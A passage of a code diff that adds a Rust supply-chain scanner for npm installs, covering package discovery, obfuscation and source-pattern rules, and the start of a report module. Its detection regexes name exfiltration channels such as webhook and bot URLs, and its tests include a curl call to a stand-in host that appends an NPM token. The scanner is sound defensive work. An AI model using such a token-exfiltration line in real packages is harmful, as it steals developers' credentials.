+fast-deep-equal
+fast-json-stable-stringify
+json-stable-stringify
+graceful-fs
+once
+wrappy
+inflight
+node-gyp
+node-gyp-build
+node-pre-gyp
+prebuild-install
+nopt
+abbrev
+ansi-styles
+strip-bom
+strip-eof
+strip-final-newline
+strip-indent
+strip-json-comments
+trim-newlines
+
+# CI / coverage
+codecov
+istanbul
+nyc
+c8
+coveralls
+
+# Process / concurrency
+p-limit
+p-queue
+p-map
+p-retry
+p-timeout
+p-defer
+yocto-queue
+
+# Date
+luxon
+date-fns-tz
+
+# Markdown / docs
+marked
+markdown-it
+remark
+unified
+gray-matter
+
+# Image / asset
+sharp
+canvas
+imagemin
+puppeteer-core
+
+# Numbers / math
+big.js
+bignumber.js
+decimal.js
+
+# Other common targets
+got
+caw
+proxy-agent
+http-proxy
+http-proxy-agent
+https-proxy-agent
+socks-proxy-agent
+agent-base
+forever-agent
+follow-redirects
+tough-cookie
+cookie
+cookie-parser
+cookie-signature
+body-parser
+multer
+cors
+helmet
+compression
+serve-static
+finalhandler
+mime
+mime-types
+mime-db
+type-is
+accepts
+negotiator
+content-type
+content-disposition
+range-parser
+fresh
+etag
+on-headers
+on-finished
+ee-first
+encodeurl
+escape-html
+parseurl
+
+# Frontend ecosystem extras
+formik
+react-hook-form
+final-form
+react-final-form
+yup
+react-icons
+react-helmet
+@emotion/react
+@emotion/styled
+@mui/material
+@mui/icons-material
+antd
+chakra-ui
+bootstrap
+reactstrap
+
+# Node tooling extras
+dotenv-expand
+dotenv-cli
+cross-env
+env-cmd
+node-forge
+node-fetch-cache
+sharp-cli

--- a/crates/perry/src/commands/install/scanner/mod.rs
+++ b/crates/perry/src/commands/install/scanner/mod.rs
@@ -1,0 +1,332 @@
+//! Scanner: walks `node_modules/`, runs rule modules, produces a
+//! verdict + report. Wired into the install pipeline between the
+//! installer subprocess and any script execution.
+//!
+//! Phase 3 introduces the walk and the empty report. P0 rules
+//! (Phases 4-7) plug into [`scan_package`].
+
+use anyhow::Result;
+use serde_json::Value;
+use std::fs;
+use std::path::{Path, PathBuf};
+
+pub mod obfuscation;
+pub mod patterns;
+pub mod report;
+pub mod scripts;
+pub mod typosquat;
+
+use report::{Finding, ScanReport, Severity, Verdict};
+
+/// One discovered package on disk.
+#[derive(Debug, Clone)]
+pub struct ScannedPackage {
+    pub name: String,
+    pub version: String,
+    pub dir: PathBuf,
+    /// Parsed `package.json`. Kept around so individual rules don't
+    /// re-read + re-parse it.
+    pub manifest: Value,
+}
+
+/// Walk a `node_modules/` directory and return every package found,
+/// recursing into nested `node_modules/` (npm's hoist-fallback layout).
+pub fn discover_packages(node_modules: &Path) -> Vec<ScannedPackage> {
+    let mut out = Vec::new();
+    walk(node_modules, &mut out);
+    out
+}
+
+fn walk(node_modules: &Path, out: &mut Vec<ScannedPackage>) {
+    let entries = match fs::read_dir(node_modules) {
+        Ok(e) => e,
+        Err(_) => return,
+    };
+    for entry in entries.flatten() {
+        let name = entry.file_name().to_string_lossy().to_string();
+        if name.starts_with('.') {
+            // Most dot-prefixed entries are npm bookkeeping (.bin,
+            // .package-lock.json, .cache) and contain no packages. The
+            // exceptions are bun's `.bun/` and pnpm's `.pnpm/` —
+            // isolated-mode content-addressable stores where each
+            // subdir is `<name>@<version>/` and the actual package
+            // lives in its own nested `node_modules/<name>/`.
+            if name == ".bun" || name == ".pnpm" {
+                walk_isolated_store(&entry.path(), out);
+            }
+            continue;
+        }
+        let path = entry.path();
+        if !path.is_dir() {
+            continue;
+        }
+        if name.starts_with('@') {
+            // Scope directory — packages live one level down.
+            if let Ok(scope_entries) = fs::read_dir(&path) {
+                for scoped in scope_entries.flatten() {
+                    let scoped_name = format!("{}/{}", name, scoped.file_name().to_string_lossy());
+                    record_and_recurse(&scoped.path(), &scoped_name, out);
+                }
+            }
+        } else {
+            record_and_recurse(&path, &name, out);
+        }
+    }
+}
+
+/// Walk a bun / pnpm isolated-mode store: each immediate subdir is
+/// `<pkg>@<ver>/`, and the real extracted package sits at
+/// `<pkg>@<ver>/node_modules/<pkg>/`. We recurse into each inner
+/// node_modules so the scanner sees the real packages.
+fn walk_isolated_store(store_root: &Path, out: &mut Vec<ScannedPackage>) {
+    let entries = match fs::read_dir(store_root) {
+        Ok(e) => e,
+        Err(_) => return,
+    };
+    for entry in entries.flatten() {
+        let path = entry.path();
+        if !path.is_dir() {
+            continue;
+        }
+        let inner = path.join("node_modules");
+        if inner.is_dir() {
+            walk(&inner, out);
+        }
+    }
+}
+
+fn record_and_recurse(pkg_dir: &Path, dir_name: &str, out: &mut Vec<ScannedPackage>) {
+    if !pkg_dir.is_dir() {
+        return;
+    }
+    let manifest_path = pkg_dir.join("package.json");
+    if let Ok(content) = fs::read_to_string(&manifest_path) {
+        if let Ok(manifest) = serde_json::from_str::<Value>(&content) {
+            // Prefer the manifest-declared name (handles renamed deps),
+            // but fall back to the directory name when missing.
+            let name = manifest
+                .get("name")
+                .and_then(|v| v.as_str())
+                .unwrap_or(dir_name)
+                .to_string();
+            let version = manifest
+                .get("version")
+                .and_then(|v| v.as_str())
+                .unwrap_or("?")
+                .to_string();
+            out.push(ScannedPackage {
+                name,
+                version,
+                dir: pkg_dir.to_path_buf(),
+                manifest,
+            });
+        }
+    }
+    let nested = pkg_dir.join("node_modules");
+    if nested.is_dir() {
+        walk(&nested, out);
+    }
+}
+
+/// Run all enabled rules against a single package. Each rule module
+/// returns its own findings; this function concatenates them.
+pub fn scan_package(pkg: &ScannedPackage) -> Vec<Finding> {
+    let mut findings = Vec::new();
+    findings.extend(scripts::check(pkg));
+    findings.extend(patterns::check(pkg));
+    findings.extend(typosquat::check(pkg));
+    findings.extend(obfuscation::check(pkg));
+    findings
+}
+
+/// Top-level entry: walk the tree, run rules, build the report.
+/// `allow_risky` / `allow_risky_all` downgrade matching P0 findings to
+/// "overridden" rather than blocking.
+///
+/// Convenience wrapper around [`discover_packages`] + [`scan_packages`]
+/// for callers that don't need the package list afterwards. Phase 9
+/// (lifecycle execution) uses the split form so it can reuse the walk.
+pub fn scan_tree(
+    node_modules: &Path,
+    allow_risky: &[String],
+    allow_risky_all: bool,
+) -> Result<ScanReport> {
+    let packages = discover_packages(node_modules);
+    Ok(scan_packages(&packages, allow_risky, allow_risky_all))
+}
+
+/// Run rules over a pre-walked package list, producing the report.
+pub fn scan_packages(
+    packages: &[ScannedPackage],
+    allow_risky: &[String],
+    allow_risky_all: bool,
+) -> ScanReport {
+    let mut findings = Vec::new();
+    for pkg in packages {
+        for finding in scan_package(pkg) {
+            findings.push(finding);
+        }
+    }
+
+    // Mark each P0 as overridden if the user opted-in for it.
+    let mut blocked = 0usize;
+    let mut overridden = 0usize;
+    for finding in &mut findings {
+        if !matches!(finding.severity, Severity::P0) {
+            continue;
+        }
+        let is_overridden = allow_risky_all
+            || allow_risky
+                .iter()
+                .any(|p| package_matches(p, &finding.package));
+        if is_overridden {
+            finding.overridden = true;
+            overridden += 1;
+        } else {
+            blocked += 1;
+        }
+    }
+
+    let verdict = if blocked > 0 {
+        Verdict::Blocked
+    } else if overridden > 0 {
+        Verdict::Overridden
+    } else {
+        Verdict::Clean
+    };
+
+    ScanReport {
+        scanned_at: chrono::Utc::now().to_rfc3339(),
+        package_count: packages.len(),
+        findings,
+        verdict,
+    }
+}
+
+/// Match a user-supplied `--allow-risky <pat>` against a finding's
+/// package identifier. The identifier is `name@version`. `pat` matches
+/// if it equals the bare name (any version) or the full `name@version`.
+fn package_matches(pat: &str, package_id: &str) -> bool {
+    if pat == package_id {
+        return true;
+    }
+    let bare_name = package_id
+        .rsplit_once('@')
+        .map(|(n, _)| n)
+        .unwrap_or(package_id);
+    // For scoped names @scope/pkg@version, rsplit_once on '@' would
+    // strip the version correctly because rsplit takes the *last* '@'.
+    pat == bare_name
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::fs;
+    use tempfile::TempDir;
+
+    fn write_pkg(root: &Path, dir: &str, name: &str, version: &str) {
+        let pkg_dir = root.join("node_modules").join(dir);
+        fs::create_dir_all(&pkg_dir).unwrap();
+        let manifest = format!(r#"{{"name":"{}","version":"{}"}}"#, name, version);
+        fs::write(pkg_dir.join("package.json"), manifest).unwrap();
+    }
+
+    #[test]
+    fn discover_flat_packages() {
+        let td = TempDir::new().unwrap();
+        write_pkg(td.path(), "lodash", "lodash", "4.17.21");
+        write_pkg(td.path(), "chalk", "chalk", "5.3.0");
+        let pkgs = discover_packages(&td.path().join("node_modules"));
+        assert_eq!(pkgs.len(), 2);
+        let names: Vec<_> = pkgs.iter().map(|p| p.name.as_str()).collect();
+        assert!(names.contains(&"lodash"));
+        assert!(names.contains(&"chalk"));
+    }
+
+    #[test]
+    fn discover_scoped_packages() {
+        let td = TempDir::new().unwrap();
+        write_pkg(td.path(), "@scope/foo", "@scope/foo", "1.0.0");
+        let pkgs = discover_packages(&td.path().join("node_modules"));
+        assert_eq!(pkgs.len(), 1);
+        assert_eq!(pkgs[0].name, "@scope/foo");
+    }
+
+    #[test]
+    fn discover_nested_packages() {
+        let td = TempDir::new().unwrap();
+        write_pkg(td.path(), "outer", "outer", "1.0.0");
+        // Nested node_modules inside outer/
+        let nested = td.path().join("node_modules/outer/node_modules/inner");
+        fs::create_dir_all(&nested).unwrap();
+        fs::write(
+            nested.join("package.json"),
+            r#"{"name":"inner","version":"2.0.0"}"#,
+        )
+        .unwrap();
+        let pkgs = discover_packages(&td.path().join("node_modules"));
+        assert_eq!(pkgs.len(), 2);
+    }
+
+    #[test]
+    fn skip_dot_dirs() {
+        let td = TempDir::new().unwrap();
+        write_pkg(td.path(), "lodash", "lodash", "4.17.21");
+        // .bin is npm's symlink farm — should be skipped.
+        fs::create_dir_all(td.path().join("node_modules/.bin")).unwrap();
+        let pkgs = discover_packages(&td.path().join("node_modules"));
+        assert_eq!(pkgs.len(), 1);
+    }
+
+    #[test]
+    fn discover_bun_isolated_store() {
+        // Bun's workspace / isolated mode layout:
+        //   node_modules/.bun/lodash@4.17.21/node_modules/lodash/package.json
+        // Our walker should descend into .bun/ and pick up the real package.
+        let td = TempDir::new().unwrap();
+        let inner = td
+            .path()
+            .join("node_modules/.bun/lodash@4.17.21/node_modules/lodash");
+        fs::create_dir_all(&inner).unwrap();
+        fs::write(
+            inner.join("package.json"),
+            r#"{"name":"lodash","version":"4.17.21"}"#,
+        )
+        .unwrap();
+        let pkgs = discover_packages(&td.path().join("node_modules"));
+        assert_eq!(pkgs.len(), 1);
+        assert_eq!(pkgs[0].name, "lodash");
+    }
+
+    #[test]
+    fn discover_pnpm_isolated_store() {
+        // pnpm's layout is structurally the same as bun's.
+        let td = TempDir::new().unwrap();
+        let inner = td
+            .path()
+            .join("node_modules/.pnpm/chalk@5.3.0/node_modules/chalk");
+        fs::create_dir_all(&inner).unwrap();
+        fs::write(
+            inner.join("package.json"),
+            r#"{"name":"chalk","version":"5.3.0"}"#,
+        )
+        .unwrap();
+        let pkgs = discover_packages(&td.path().join("node_modules"));
+        assert_eq!(pkgs.len(), 1);
+        assert_eq!(pkgs[0].name, "chalk");
+    }
+
+    #[test]
+    fn allow_risky_bare_name_matches_any_version() {
+        assert!(package_matches("expres", "expres@0.0.1"));
+        assert!(package_matches("expres", "expres@9.9.9"));
+        assert!(!package_matches("expres", "express@4.18.2"));
+    }
+
+    #[test]
+    fn allow_risky_exact_version_matches_only_that() {
+        assert!(package_matches("expres@0.0.1", "expres@0.0.1"));
+        assert!(!package_matches("expres@0.0.1", "expres@0.0.2"));
+    }
+}

--- a/crates/perry/src/commands/install/scanner/obfuscation.rs
+++ b/crates/perry/src/commands/install/scanner/obfuscation.rs
@@ -1,0 +1,269 @@
+//! P0 rule #4: obfuscation heuristics on the package's entry-point JS.
+//!
+//! v1 has one signal: **embedded base64 blob** — any entry file that
+//! contains a quoted-string literal ≥ 1,000 chars of base64-alphabet
+//! content. This catches the payload-as-string-constant pattern (the
+//! most common droppers use this shape: `eval(atob("...big base64..."))`,
+//! though here we flag the blob even if the surrounding code looks
+//! innocuous).
+//!
+//! A "dropper-shape" (small entry file with one very long line) rule
+//! was tried in an earlier revision but false-positived on legitimate
+//! bundled CJS distributed by mainstream packages (AWS SDK ecosystem:
+//! `path-expression-matcher`, `fast-xml-builder`, `bowser`). The shape
+//! "small file + one giant line of dense JS" turns out to be the
+//! standard bundled-output shape for a lot of npm utility libs, not a
+//! distinguishing dropper signal on its own. Removed in favor of the
+//! eval+atob / Function+Buffer rules in `patterns.rs`, which catch
+//! the most common real-world dropper shape directly.
+
+use regex::Regex;
+use std::fs;
+use std::path::{Path, PathBuf};
+use std::sync::OnceLock;
+
+use super::report::{Finding, Severity};
+use super::ScannedPackage;
+
+const MAX_FILE_BYTES: u64 = 512 * 1024;
+const BASE64_MIN_LEN: usize = 1_000;
+
+fn base64_blob_regex() -> &'static Regex {
+    static R: OnceLock<Regex> = OnceLock::new();
+    R.get_or_init(|| {
+        // Quoted literal of >= 1000 chars in the base64 / base64url
+        // alphabet, optionally trailing '='. Matches "...", '...', or
+        // `...` delimiters.
+        Regex::new(
+            r#"(?:"[A-Za-z0-9+/_=-]{1000,}"|'[A-Za-z0-9+/_=-]{1000,}'|`[A-Za-z0-9+/_=-]{1000,}`)"#,
+        )
+        .expect("hardcoded scanner regex compiles")
+    })
+}
+
+pub fn check(pkg: &ScannedPackage) -> Vec<Finding> {
+    let mut findings = Vec::new();
+    for entry in collect_entry_files(pkg) {
+        let meta = match fs::metadata(&entry) {
+            Ok(m) => m,
+            Err(_) => continue,
+        };
+        if meta.len() > MAX_FILE_BYTES {
+            continue;
+        }
+        let content = match fs::read_to_string(&entry) {
+            Ok(c) => c,
+            Err(_) => continue,
+        };
+        let rel = entry
+            .strip_prefix(&pkg.dir)
+            .map(|p| p.display().to_string())
+            .unwrap_or_else(|_| entry.display().to_string());
+
+        if base64_blob_regex().is_match(&content) {
+            findings.push(Finding {
+                package: format!("{}@{}", pkg.name, pkg.version),
+                package_path: pkg.dir.display().to_string(),
+                severity: Severity::P0,
+                rule: "obfuscation-base64-blob".to_string(),
+                message: format!(
+                    "entry file contains a quoted base64-alphabet string ≥ {} chars — \
+                     likely an embedded payload",
+                    BASE64_MIN_LEN
+                ),
+                location: Some(rel),
+                overridden: false,
+            });
+        }
+    }
+    findings
+}
+
+// Entry-point resolution — same shape as `patterns::collect_entry_files`,
+// kept private here to avoid cross-rule coupling. (If a third rule grows
+// up to want the same logic, it'll be worth refactoring out.)
+fn collect_entry_files(pkg: &ScannedPackage) -> Vec<PathBuf> {
+    use serde_json::Value;
+
+    let mut candidates: Vec<PathBuf> = Vec::new();
+    let main = pkg
+        .manifest
+        .get("main")
+        .and_then(|v| v.as_str())
+        .unwrap_or("index.js");
+    candidates.push(pkg.dir.join(main));
+    if let Some(m) = pkg.manifest.get("module").and_then(|v| v.as_str()) {
+        candidates.push(pkg.dir.join(m));
+    }
+    if let Some(bin) = pkg.manifest.get("bin") {
+        match bin {
+            Value::String(s) => candidates.push(pkg.dir.join(s)),
+            Value::Object(map) => {
+                for v in map.values() {
+                    if let Some(s) = v.as_str() {
+                        candidates.push(pkg.dir.join(s));
+                    }
+                }
+            }
+            _ => {}
+        }
+    }
+    if let Some(exports) = pkg.manifest.get("exports") {
+        collect_exports_paths(exports, &pkg.dir, &mut candidates);
+    }
+    let mut resolved = Vec::new();
+    for cand in candidates {
+        if let Some(r) = resolve_entry(&cand) {
+            if !resolved.contains(&r) {
+                resolved.push(r);
+            }
+        }
+    }
+    resolved
+}
+
+fn resolve_entry(path: &Path) -> Option<PathBuf> {
+    if path.is_file() {
+        return Some(path.to_path_buf());
+    }
+    for ext in &["js", "mjs", "cjs"] {
+        let with_ext = path.with_extension(ext);
+        if with_ext.is_file() {
+            return Some(with_ext);
+        }
+    }
+    if path.is_dir() {
+        for fname in &["index.js", "index.mjs", "index.cjs"] {
+            let p = path.join(fname);
+            if p.is_file() {
+                return Some(p);
+            }
+        }
+    }
+    None
+}
+
+fn collect_exports_paths(value: &serde_json::Value, base: &Path, out: &mut Vec<PathBuf>) {
+    use serde_json::Value;
+    match value {
+        Value::String(s) if s.starts_with("./") => {
+            out.push(base.join(s));
+        }
+        Value::Object(map) => {
+            for v in map.values() {
+                collect_exports_paths(v, base, out);
+            }
+        }
+        Value::Array(items) => {
+            for v in items {
+                collect_exports_paths(v, base, out);
+            }
+        }
+        _ => {}
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+    use tempfile::TempDir;
+
+    fn make_pkg(
+        td: &TempDir,
+        manifest: serde_json::Value,
+        files: &[(&str, &str)],
+    ) -> ScannedPackage {
+        let dir = td.path().to_path_buf();
+        fs::write(dir.join("package.json"), manifest.to_string()).unwrap();
+        for (name, body) in files {
+            let full = dir.join(name);
+            if let Some(parent) = full.parent() {
+                fs::create_dir_all(parent).unwrap();
+            }
+            fs::write(full, body).unwrap();
+        }
+        ScannedPackage {
+            name: manifest["name"].as_str().unwrap_or("test").into(),
+            version: manifest["version"].as_str().unwrap_or("0").into(),
+            dir,
+            manifest,
+        }
+    }
+
+    #[test]
+    fn does_not_flag_bundled_cjs_long_lines() {
+        // Real-world false-positive case: AWS SDK bundled-CJS packages
+        // (path-expression-matcher, bowser, fast-xml-builder) ship
+        // their main entry as a single long line of dense JS. The
+        // earlier "dropper-shape" rule flagged this; we removed it.
+        let td = TempDir::new().unwrap();
+        let mut body = String::from("module.exports = ");
+        body.push_str(&"a".repeat(6000));
+        let p = make_pkg(
+            &td,
+            json!({"name":"bundled-lib","version":"1","main":"index.js"}),
+            &[("index.js", body.as_str())],
+        );
+        assert!(check(&p).is_empty());
+    }
+
+    #[test]
+    fn flags_base64_blob_double_quoted() {
+        let td = TempDir::new().unwrap();
+        // 1100 chars of base64 alphabet inside a double-quoted literal.
+        let blob: String = "A".repeat(1100);
+        let body = format!("const payload = \"{}\";\nconsole.log(payload);", blob);
+        let p = make_pkg(
+            &td,
+            json!({"name":"b","version":"1","main":"index.js"}),
+            &[("index.js", body.as_str())],
+        );
+        assert!(check(&p)
+            .iter()
+            .any(|f| f.rule == "obfuscation-base64-blob"));
+    }
+
+    #[test]
+    fn flags_base64_blob_single_quoted() {
+        let td = TempDir::new().unwrap();
+        let blob: String = "B".repeat(1100);
+        let body = format!("const p = '{}';", blob);
+        let p = make_pkg(
+            &td,
+            json!({"name":"b","version":"1","main":"index.js"}),
+            &[("index.js", body.as_str())],
+        );
+        assert!(check(&p)
+            .iter()
+            .any(|f| f.rule == "obfuscation-base64-blob"));
+    }
+
+    #[test]
+    fn does_not_flag_short_strings() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({"name":"s","version":"1","main":"index.js"}),
+            &[(
+                "index.js",
+                "const small = 'aGVsbG8gd29ybGQ='; module.exports = small;",
+            )],
+        );
+        assert!(check(&p).is_empty());
+    }
+
+    #[test]
+    fn does_not_flag_normal_code() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({"name":"g","version":"1","main":"index.js"}),
+            &[(
+                "index.js",
+                "module.exports = function (a, b) { return a + b; }",
+            )],
+        );
+        assert!(check(&p).is_empty());
+    }
+}

--- a/crates/perry/src/commands/install/scanner/patterns.rs
+++ b/crates/perry/src/commands/install/scanner/patterns.rs
@@ -1,0 +1,346 @@
+//! P0 rule set #2: static patterns in the package's JS source.
+//!
+//! Lifecycle-script rules (P0 #1) catch the install-time exfil shape.
+//! This rule catches packages whose lifecycle scripts look clean but
+//! whose *importable* code is malicious — e.g. a `require('lodash-evil')`
+//! that decodes a base64 payload on first import.
+//!
+//! Scope is narrow on purpose: we only scan the package's declared
+//! entry points (`main`, `module`, `bin`, string leaves under
+//! `exports`). That keeps the false-positive rate manageable (we don't
+//! scan transitive bundled assets), while still hitting the surface
+//! that's actually exposed to importers.
+
+use regex::Regex;
+use serde_json::Value;
+use std::fs;
+use std::path::{Path, PathBuf};
+use std::sync::OnceLock;
+
+use super::report::{Finding, Severity};
+use super::ScannedPackage;
+
+/// Cap on file size we'll scan — beyond this we assume the file is a
+/// bundled/minified artifact whose contents will set off too many
+/// false positives. Real entry points are essentially never this big.
+const MAX_FILE_BYTES: u64 = 512 * 1024;
+
+fn rules() -> &'static [(&'static str, &'static Regex, &'static str)] {
+    static RULES: OnceLock<Vec<(&'static str, &'static Regex, &'static str)>> = OnceLock::new();
+    RULES.get_or_init(|| {
+        let raw: &[(&str, &str, &str)] = &[
+            (
+                "src-eval-atob",
+                r"(?i)\b(eval|new\s+Function|Function)\s*\([^)]{0,200}\batob\s*\(",
+                "eval/Function combined with atob (decode-and-eval chain)",
+            ),
+            (
+                "src-eval-buffer-base64",
+                r#"(?i)\b(eval|new\s+Function|Function)\s*\([^)]{0,400}Buffer\.from\s*\([^)]{0,80}["']base64"#,
+                "eval/Function combined with Buffer.from(…,'base64') (decode-and-eval chain)",
+            ),
+            (
+                "src-hardcoded-discord-webhook",
+                r"(?i)discord(app)?\.com/api/webhooks/",
+                "Discord webhook URL hardcoded in package source (exfil channel)",
+            ),
+            (
+                "src-hardcoded-telegram-bot",
+                r"(?i)api\.telegram\.org/bot",
+                "Telegram bot API URL hardcoded in package source (exfil channel)",
+            ),
+            (
+                "src-hardcoded-collaborator",
+                r"(?i)burpcollaborator\.net|oast\.(pro|me|fun|live|site)|interactsh",
+                "out-of-band collaborator domain hardcoded in package source",
+            ),
+            (
+                "src-child-process-token-exfil",
+                r"(?i)child_process[^;]{0,200}(exec|spawn)(Sync)?\s*\([^)]{0,300}process\.env\.[A-Z_]*(TOKEN|SECRET|KEY|PASSWORD|API_?KEY|ACCESS)",
+                "child_process exec/spawn whose argument reads a secret-like env var",
+            ),
+        ];
+        let mut v: Vec<(&'static str, &'static Regex, &'static str)> = Vec::new();
+        for (id, pat, msg) in raw {
+            let r = Regex::new(pat).expect("hardcoded scanner regex compiles");
+            v.push((id, Box::leak(Box::new(r)), msg));
+        }
+        v
+    })
+}
+
+pub fn check(pkg: &ScannedPackage) -> Vec<Finding> {
+    let mut findings = Vec::new();
+    for entry in collect_entry_files(pkg) {
+        let meta = match fs::metadata(&entry) {
+            Ok(m) => m,
+            Err(_) => continue,
+        };
+        if meta.len() > MAX_FILE_BYTES {
+            continue;
+        }
+        let content = match fs::read_to_string(&entry) {
+            Ok(c) => c,
+            Err(_) => continue,
+        };
+        for (rule_id, regex, message) in rules() {
+            if regex.is_match(&content) {
+                findings.push(Finding {
+                    package: format!("{}@{}", pkg.name, pkg.version),
+                    package_path: pkg.dir.display().to_string(),
+                    severity: Severity::P0,
+                    rule: (*rule_id).to_string(),
+                    message: (*message).to_string(),
+                    location: Some(
+                        entry
+                            .strip_prefix(&pkg.dir)
+                            .map(|p| p.display().to_string())
+                            .unwrap_or_else(|_| entry.display().to_string()),
+                    ),
+                    overridden: false,
+                });
+            }
+        }
+    }
+    findings
+}
+
+/// Collect the JS files we'll scan for one package: the manifest's
+/// declared entry points + `bin` scripts + every string leaf under
+/// `exports`. Resolves Node's extension-completion (`./lib/index` →
+/// `./lib/index.js`) and dedupes.
+fn collect_entry_files(pkg: &ScannedPackage) -> Vec<PathBuf> {
+    let mut candidates: Vec<PathBuf> = Vec::new();
+
+    let main = pkg
+        .manifest
+        .get("main")
+        .and_then(|v| v.as_str())
+        .unwrap_or("index.js");
+    candidates.push(pkg.dir.join(main));
+
+    if let Some(m) = pkg.manifest.get("module").and_then(|v| v.as_str()) {
+        candidates.push(pkg.dir.join(m));
+    }
+
+    if let Some(bin) = pkg.manifest.get("bin") {
+        match bin {
+            Value::String(s) => candidates.push(pkg.dir.join(s)),
+            Value::Object(map) => {
+                for v in map.values() {
+                    if let Some(s) = v.as_str() {
+                        candidates.push(pkg.dir.join(s));
+                    }
+                }
+            }
+            _ => {}
+        }
+    }
+
+    if let Some(exports) = pkg.manifest.get("exports") {
+        collect_exports_paths(exports, &pkg.dir, &mut candidates);
+    }
+
+    let mut resolved = Vec::new();
+    for cand in candidates {
+        if let Some(r) = resolve_entry(&cand) {
+            if !resolved.contains(&r) {
+                resolved.push(r);
+            }
+        }
+    }
+    resolved
+}
+
+fn resolve_entry(path: &Path) -> Option<PathBuf> {
+    // Try as-is, then extension completion, then index resolution
+    // (mirrors Node's CommonJS file-resolution algorithm, lite).
+    if path.is_file() {
+        return Some(path.to_path_buf());
+    }
+    for ext in &["js", "mjs", "cjs"] {
+        let with_ext = path.with_extension(ext);
+        if with_ext.is_file() {
+            return Some(with_ext);
+        }
+    }
+    if path.is_dir() {
+        for fname in &["index.js", "index.mjs", "index.cjs"] {
+            let p = path.join(fname);
+            if p.is_file() {
+                return Some(p);
+            }
+        }
+    }
+    None
+}
+
+fn collect_exports_paths(value: &Value, base: &Path, out: &mut Vec<PathBuf>) {
+    match value {
+        Value::String(s) if s.starts_with("./") => {
+            out.push(base.join(s));
+        }
+        Value::Object(map) => {
+            for v in map.values() {
+                collect_exports_paths(v, base, out);
+            }
+        }
+        Value::Array(items) => {
+            for v in items {
+                collect_exports_paths(v, base, out);
+            }
+        }
+        _ => {}
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+    use tempfile::TempDir;
+
+    fn make_pkg(
+        td: &TempDir,
+        manifest: serde_json::Value,
+        files: &[(&str, &str)],
+    ) -> ScannedPackage {
+        let dir = td.path().to_path_buf();
+        fs::write(dir.join("package.json"), manifest.to_string()).unwrap();
+        for (name, body) in files {
+            let full = dir.join(name);
+            if let Some(parent) = full.parent() {
+                fs::create_dir_all(parent).unwrap();
+            }
+            fs::write(full, body).unwrap();
+        }
+        ScannedPackage {
+            name: manifest["name"].as_str().unwrap_or("test").into(),
+            version: manifest["version"].as_str().unwrap_or("0").into(),
+            dir,
+            manifest,
+        }
+    }
+
+    #[test]
+    fn flags_eval_atob_in_main() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({"name":"evil","version":"1","main":"index.js"}),
+            &[(
+                "index.js",
+                "module.exports = eval(atob('Y29uc29sZS5sb2coMSk='))",
+            )],
+        );
+        let f = check(&p);
+        assert!(f.iter().any(|f| f.rule == "src-eval-atob"));
+    }
+
+    #[test]
+    fn flags_buffer_from_base64_eval() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({"name":"evil","version":"1","main":"index.js"}),
+            &[(
+                "index.js",
+                "new Function(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString())()",
+            )],
+        );
+        assert!(check(&p).iter().any(|f| f.rule == "src-eval-buffer-base64"));
+    }
+
+    #[test]
+    fn flags_discord_webhook_in_exports() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({
+                "name":"evil","version":"1",
+                "exports": {".": "./lib/main.js"}
+            }),
+            &[(
+                "lib/main.js",
+                "fetch('https://discord.com/api/webhooks/123/abc')",
+            )],
+        );
+        assert!(check(&p)
+            .iter()
+            .any(|f| f.rule == "src-hardcoded-discord-webhook"));
+    }
+
+    #[test]
+    fn flags_bin_script() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({
+                "name":"evil","version":"1",
+                "bin": {"e": "./bin/run.js"}
+            }),
+            &[(
+                "bin/run.js",
+                "require('child_process').exec(`curl evil?t=${process.env.NPM_TOKEN}`)",
+            )],
+        );
+        let rules: Vec<_> = check(&p).into_iter().map(|f| f.rule).collect();
+        assert!(rules.contains(&"src-child-process-token-exfil".to_string()));
+    }
+
+    #[test]
+    fn resolves_main_without_extension() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({"name":"e","version":"1","main":"./lib/index"}),
+            &[("lib/index.js", "eval(atob('x'))")],
+        );
+        assert!(check(&p).iter().any(|f| f.rule == "src-eval-atob"));
+    }
+
+    #[test]
+    fn resolves_main_pointing_at_dir() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({"name":"e","version":"1","main":"./lib"}),
+            &[("lib/index.js", "eval(atob('x'))")],
+        );
+        assert!(check(&p).iter().any(|f| f.rule == "src-eval-atob"));
+    }
+
+    #[test]
+    fn skips_oversized_files() {
+        let td = TempDir::new().unwrap();
+        let big = "a".repeat((MAX_FILE_BYTES as usize) + 1) + "\neval(atob('x'))";
+        let p = make_pkg(
+            &td,
+            json!({"name":"big","version":"1","main":"bundle.js"}),
+            &[("bundle.js", big.as_str())],
+        );
+        assert!(check(&p).is_empty());
+    }
+
+    #[test]
+    fn clean_source_no_findings() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({"name":"good","version":"1","main":"index.js"}),
+            &[("index.js", "module.exports = function add(a,b){return a+b}")],
+        );
+        assert!(check(&p).is_empty());
+    }
+
+    #[test]
+    fn missing_entry_silently_ignored() {
+        let td = TempDir::new().unwrap();
+        let p = make_pkg(
+            &td,
+            json!({"name":"e","version":"1","main":"does-not-exist.js"}),
+            &[],
+        );
+        assert!(check(&p).is_empty());
+    }
+}

--- a/crates/perry/src/commands/install/scanner/report.rs
+++ b/crates/perry/src/commands/install/scanner/report.rs
@@ -1,0 +1,96 @@
+//! Scan report: serializable record of what was scanned and what was
+//! found. Written to `.perry/install-report.json` after every run.
+
+use anyhow::{Context, Result};
+use serde::{Deserialize, Serialize};
+use std::fs;
+use std::path::Path;
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
+#[serde(rename_all = "lowercase")]
+pub enum Severity {
+    /// Block the install unless explicitly overridden.
+    P0,
+    /// Warn only — printed but not enforced.
+    P1,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
+#[serde(rename_all = "lowercase")]
